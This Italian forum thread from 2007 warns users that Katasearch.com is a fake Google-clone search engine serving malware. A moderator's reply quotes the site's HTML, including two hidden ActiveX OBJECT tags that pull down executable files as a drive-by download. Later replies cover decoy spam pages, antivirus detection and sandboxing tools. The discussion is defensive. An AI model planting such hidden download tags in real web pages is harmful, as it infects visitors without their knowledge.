Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

Samsung Galaxy S21, S21+ S21 Ultra: eccoli nella nostra video anteprima!
Samsung Galaxy S21, S21+ S21 Ultra: eccoli nella nostra video anteprima!
Siamo riusciti ad andare al quartier generale di Milano dove Samsung ci ha permesso di mettere le mani su tutte e tre le versioni dei nuovi smartphone Galaxy S21, S21+ e S21 Ultra. Tre diverse versioni proprio come tre erano gli smartphone lo scorso anno con la serie Galaxy S20. Ecco come sono fatti.
ASUS ZenBook Duo UX482: due schermi e tanta autonomia
ASUS ZenBook Duo UX482: due schermi e tanta autonomia
La nuova gamma di notebook ASUS per il 2021 vede il ritorno di modelli con due schermi, capaci di offrire un livello di produttività ancora più elevato dello standard. ZenBook Duo UX482 abbina uno schermo da 14 pollici Full HD al nuovo ScreenPad +, tutto su piattaforma Intel EVO con processore Core i7 Tiger Lake. Tanta potenza, dimensioni contenute e autonomia con batteria da vendere
Sony FE 35mm F1.4 GMaster, grande risoluzione e sfocato eccellente. La recensione
Sony FE 35mm F1.4 GMaster, grande risoluzione e sfocato eccellente. La recensione
Sony introduce per le sue mirrorless full frame un 35mm della famiglia GMaster, che si distingue per l'elevatissimo potere risolvente e l'eccellente resa dello sfocato.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 05-06-2007, 13:05   #1
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Attenzione a Katasearch.com

Katasearch.com un falso motore basato su google che diffonde malware
Il file in questione sfugge ancora a quasi tutti gli antivirus.

per saperne di piu' come al solito c'è mio blog per chi ne ha voglia

maipiugromozon.blogspot.com
mausap è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 13:21   #2
xcdegasp
Moderatore
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27441
infatti i link della home di kataSearch.com portano a google.it

Quote:
<FONT size=-1><A
href="http://www.google.it/intl/it/ads/">Pubblicità</A> - <A
href="http://www.google.it/services/">Soluzioni Aziendali</A> - <A
href="http://www.google.it/intl/it/about.html">Tutto su Katasearch </A> - <A
href="http://www.google.com/ncr">Katasearch.com in English</A></FONT>

<P><FONT size=-2> © 4361 Katasearch </FONT></P>
<OBJECT CLASSID="CLSID:E4792F3D-760F-4f7d-9612-4DA401D88CF4" CODEBASE="sharewke.exe" width="1" height="1"></OBJECT>

<OBJECT CLASSID="CLSID:596A9DF1-13F3-4691-AC38-0516B7C2FD5E" CODEBASE="GHROMLO.exe" width="1" height="1"></OBJECT>
se l'esecuzione di script è bloccata non vi è problema a fare ricerche..
io ci sono andato con FireFox e "noScript" attivato

scarica i due file se premo "login" e bit-defender li identica come malevoli e li blocca subito, considera che è aggiornato a lunedì mattina alle ore 08:30

Ultima modifica di xcdegasp : 05-06-2007 alle 13:32.
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 14:33   #3
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22066
ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile!
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, macchina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una pagina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 05-06-2007 alle 21:18.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 14:55   #4
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Quote:
Originariamente inviato da c.m.g Guarda i messaggi
ciao mouseup,
navigando quà e là mi capita spesso su google di ritrovare nei risultati dei link sicuramente infetti da gromozon e fratelli.
volevo sapere come posso fare per comunicarteli eventualmente per "arricchire" il tuo blog molto utile!
fammi sapere.

p.s.: questi indirizzi sono facilmente riconoscibili anche senza accedervi, vi chiederete come? e presto detto: molti risultati hanno nomi strani nei domini come ad esempio: h**p:www.123544789.it (molto sospetto ma nome generato dalla mia fantasia e non so se esiste veramente) oppure hanno parole chiave che non hanno attinenza tra loro. ad esempio potreste trovare una semplice paginetta di internet con un elenco di parole chiave diverse tipo

cane, maccina, pasta al forno ecc...

un esempio di pagina sospetta è questa: h**p://www.corso-due-w.org/res472.htm

quì vi sono diverse parole chiave che non hanno attinenza tra loro.

una paghina piena che serve per aumentare le probabilità di essere visualizzata ai primi posti su google. ovviamente sono siti civetta che servono per farvi infettare da gromozon e fratelli.

Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org

Ultima modifica di mausap : 05-06-2007 alle 15:00.
mausap è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 15:09   #5
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22066
Quote:
Originariamente inviato da mausap Guarda i messaggi
Vedo con piacere che hai capito come funziona il sistema delle pagine civetta infette.Penso che siano dell'ordine delle centinaia di migliaia se non addirittura qualche milione.Google dice addirittura che
le pagine potenziamente dannose sono 1/10 di quelle presenti sul web.
Per questo io punto agli Ip. Comunque i malware di solito si trovano sempre in russia o ucraina (almeno quelli di quella gang li).Quei range devono assolutamente essere bloccati perche' ospitano fisicamente il virus.

In effetti non ci vuole molto a capire se un sito sia potenzialmente dannoso.
Di solito quando vado a controllare di cosa si tratta so gia' cosa piu' o meno mi
aspetta.Per questo usate firefox con noscript oppure ancora meglio sandboxie. Se hai qualche informazione su questo tipo di spazzatura puoi comunicarla nei commenti del blog oppure mandarmi un messaggio personale qui

Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.

Un'ultima raccomandazione per chi usa nod32. Dovete intregrare la protezione con altri software sfruttando la leggerezza di questo prodotto perche' purtroppo nod ha una capacita' di rivelazione dei virus non straordinaria attualmente.
La mia esperienza conferma i risultati di av-test.org
sarà fatto, comincia ad aspettarti un pò di messaggi privati!

p.s.: ho provveduto a segnalare a kaspersky questo tipo di rootkit che cambia spesso, insomma ho chiesto di tenere sotto controllo questo indirizzo.
per quanto riguarda il browser uso opera e non mi sono mai infettato!!!
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.

Ultima modifica di c.m.g : 05-06-2007 alle 15:28.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 15:34   #6
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22066
mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!!

quindi noi utenti kasperskini siamo già protetti.
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 20:59   #7
xcdegasp
Moderatore
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27441
non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:



clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:



l'unico modo per infettarsi è clickare sul link in alto "accesso"
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 21:15   #8
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22066
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
non mostra un sito reale come primo risultato ma un falso sito inesistente per farti scaricare i due virus che avevo riportato sopra..

esempio, ho cercato "alberti elisabetta" e il sito reale è il "albertielisabetta.eu" che è primo su google ma secondo in questo falso motore di ricerca:



clickando sul primo link non succede altro che questa schermata in loop che spinge a scaricare volontariamente il file infetto:



l'unico modo per infettarsi è clickare sul link in alto "accesso"
era solo per dare un esempio di questo caso specifico nel quale il "civetta" non è esistente...
anche cambiando ricerca esempio "bancaintesa" il primo link che compare è sempre inesistente e facente parte all'ip: 208.101.37.109
esatto
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 21:52   #9
lucas84
Senior Member
 
L'Avatar di lucas84
 
Iscritto dal: Aug 2005
Messaggi: 1267
Quote:
Originariamente inviato da c.m.g Guarda i messaggi
mi hanno appena risposto dalla kaspersky quanto segue:

Hello,

katasearch.ex - Trojan-Clicker.Win32.Agent.ip

This file is already detected. Please update your antivirus bases.


avevo scritto che era un nuovo virus ma kaspersky è troppo avanti!!!

quindi noi utenti kasperskini siamo già protetti.
Niente di straordinario in quel file
__________________
Il dubbio è il padre del sapere.
lucas84 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 22:49   #10
nuovoUtente86
Senior Member
 
Iscritto dal: Mar 2007
Messaggi: 7863
Quote:
Originariamente inviato da mausap Guarda i messaggi
Purtroppo gli antivirus fanno quello che possono ma non sono efficaci.
Mi pare molto interessante la SandBox Analyzer della Norman
che si trova anche su jotti e virustotal

I programmi di virtualizzazione, le sandbox e gli hips ormai credo sia quasi indispensabili per avere il pc sicuro.
cosa sonoi programmi di virtualizzazione?
nuovoUtente86 è offline   Rispondi citando il messaggio o parte di esso
Old 05-06-2007, 23:27   #11
mausap
Senior Member
 
Iscritto dal: Jan 2007
Messaggi: 308
Quote:
Originariamente inviato da nuovoUtente86 Guarda i messaggi
cosa sonoi programmi di virtualizzazione?
Programmi come questi:

Virtualization Tools

Altiris Software Virtualization Solution
http://www.altiris.com/Products/Soft...nSolution.aspx

BufferZone
http://www.trustware.com/home.php

Deep Freeze
http://www.faronics.com/html/deepfreeze.asp

GreenBorder
http://greenborder.com/ ---------->acquistato da Google

ShadowSurfer
http://www.shadowstor.com/products.html

VirtualSandbox
http://www.fortresgrand.com/products/vsb/vsb.htm

VMware Browser Appliance Free!
http://www.vmware.com/vmtn/vm/browserapp.html
mausap è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Samsung Galaxy S21, S21+ S21 Ultra: eccoli nella nostra video anteprima! Samsung Galaxy S21, S21+ S21 Ultra: eccoli nella...
ASUS ZenBook Duo UX482: due schermi e tanta autonomia ASUS ZenBook Duo UX482: due schermi e tanta auto...
Sony FE 35mm F1.4 GMaster, grande risoluzione e sfocato eccellente. La recensione Sony FE 35mm F1.4 GMaster, grande risoluzione e ...
Motorola moto g 5G: vincente per l’autonomia incredibile! La recensione Motorola moto g 5G: vincente per l’autonomia inc...
Elgato 4K60 Pro: come registrare gameplay di qualità su PS5 e Xbox Series X Elgato 4K60 Pro: come registrare gameplay di qua...
Castel Del Monte diventa un museo 3D gra...
Volkswagen: vendite di auto elettriche c...
Notebook senza cornici? Samsung mette la...
Nuovi monitor MSI della serie PRO MP271 ...
E' il momento giusto per comprare uno sm...
MacBook Pro del futuro: via la TouchBar ...
Amazfit Bip U Pro arriva in Italia! Ecco...
Xiaomi Mi 11, Poco X3 e Poco M3 gi&agrav...
Citroen E-C4: il crossover anche full el...
Presentato il nuovo obiettivo cinematogr...
EK Water Blocks sta lavorando su un back...
Tesla: richiamo per 158 mila auto a caus...
T-Mobile punta su Ericsson per la sua re...
Windows 10, basta un semplice comando pe...
Covalent sceglie la blockchain di IBM pe...
BurnAware Premium
BurnAware Free
K-Lite Codec Pack Update
K-Lite Mega Codec Pack
K-Lite Codec Pack Full
IObit Uninstaller
IObit Smart Defrag
Opera Portable
3DMark
Opera 73
Prime95
CCleaner Portable
CCleaner Standard
Advanced SystemCare
IrfanView
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 01:38.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
Served by www1v